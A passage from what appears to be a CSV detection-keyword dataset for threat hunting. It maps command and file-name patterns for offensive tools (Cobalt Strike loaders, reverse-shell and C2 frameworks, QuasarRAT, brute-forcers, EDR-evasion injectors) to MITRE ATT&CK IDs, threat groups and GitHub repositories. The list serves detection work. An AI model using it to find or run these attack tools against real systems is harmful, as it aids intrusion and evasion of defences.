,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*python2??/generator.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python2??/PyLoader.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python3 ./exp.py --url http://*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,0,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*python3 fee.py*,offensive_tool_keyword,fileless-elf-exec,Execute ELF files without dropping them on disk,T1059.003 - T1055.012 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/nnsee/fileless-elf-exec,1,1,N/A,8,4,334,40,2021-11-16T15:46:23Z,2020-01-06T12:19:34Z -*python3 gcr.py*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,0,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*python3 GetHash.py NtCreateFile*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*python3 -m orbitaldump *,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation 
tools,https://github.com/k4yt3x/orbitaldump,1,0,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*python3 -m S3Scanner*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*python3 Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*python3 pacu.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*python3 rsf.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*python3 scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*python3 sitadel*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*python3 st client wss://*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python3 st.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python3*.exe .\nxc*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*python3??/generator.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python3??/PyLoader.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*python3_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*python3_reverse_tcp_v2.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*pywerview.py*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*pywhisker.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pywhisker.py*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*pywhisker-main*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - 
TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*pywsus.py*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,1,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z 
-*qtc-de/remote-method-guesser*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*QUAPCInjectAsSystem*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*QUAPCInjectElevated*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*QUAPCInjectFakecmd*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*QUAPCInjectFakecmd*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*QUAPCInjectWithoutPid*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*Quasar.Client.*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar.exe*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar.Server*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,0,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar.sln*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*quasar/Quasar*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*Quasar-master.zip*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*QuasarRAT*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*quentinhardy*msdat*,offensive_tool_keyword,MSDAT,MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.,T1110 - T1059 - T1210 - T1047,TA0002 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/quentinhardy/msdat,1,1,N/A,N/A,8,764,144,2023-08-01T10:54:24Z,2018-02-15T12:34:57Z -*quser.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 